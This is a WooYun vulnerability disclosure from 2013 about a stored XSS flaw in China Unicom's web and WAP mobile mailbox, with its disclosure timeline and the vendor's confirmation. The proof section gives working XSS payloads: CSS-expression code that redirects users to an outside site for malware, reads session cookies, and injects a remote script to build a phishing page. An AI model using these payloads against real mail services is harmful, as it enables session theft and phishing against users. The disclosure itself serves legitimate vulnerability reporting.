漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-035969
漏洞标题:中国联通手机邮箱web/wap版XSS漏洞
相关厂商:中国联通
漏洞作者: Liuz5O69
提交时间:2013-09-03 11:19
修复时间:2013-10-18 11:20
公开时间:2013-10-18 11:20
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-03: 细节已通知厂商并且等待厂商处理中
2013-09-07: 厂商已经确认,细节仅向厂商公开
2013-09-17: 细节向核心白帽子及相关领域专家公开
2013-09-27: 细节向普通白帽子公开
2013-10-07: 细节向实习白帽子公开
2013-10-18: 细节向公众公开
简要描述:
中国联通邮箱邮件正文对部分标签下的脚本过滤不严,导致存储型跨站漏洞,利用该漏洞可实施Cookie窃取、网页挂马、跨站钓鱼等攻击。
详细说明:
同之前公布的漏洞利用方式不同,联通桌面版的web邮箱已不存在img标签下的XSS,本次可用的是CSS expression下的XSS,另外,wap版下的邮箱依然可用img进行XSS。
如发送邮件:
<DIV STYLE="width: expression((window.r==1)?'':(window.r=1,alert('expression_XSS')));">
如图:
wap下提交:
<img src="" onerror="alert('null_img_xss')">
如图:
漏洞证明:
WEB版本:
1.提交<DIV STYLE="width: expression((window.r==1)?'':(window.r=1,window.location.href='http://tools88.com/'));"> 可实施挂马攻击,如图:
2.提交<DIV STYLE="width: expression((window.r==1)?'':(window.r=1,alert(top.window.document.cookie)));"> 可实施cookie的获取(注意需要加上top.window,邮件正文页面部分的location.href为about:blank,直接获取不到cookie),如图:
3.提交<DIV STYLE='width: expression((window.r==1)?"":(window.r=1,b=top.window.document.createElement("script"),b.src="http:/.......(恶意功能JS脚本地址,需编码);",top.window.document.body.appendChild(b)));'> 来实施XSS钓鱼欺骗攻击,如图:
可以看到URL依然为wo邮箱的地址,但实际该页面已经是虚假钓鱼页面,页面代码由指向的JS生成,JS代码如图:
WAP版:
利用方式差不多,如图为iphone访问wap页面后cookie窃取效果:
手机端访问:
信息获取:
修复方案:
过滤
版权声明:转载请注明来源 Liuz5O69@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2013-09-07 22:47
厂商回复:
最新状态:
暂无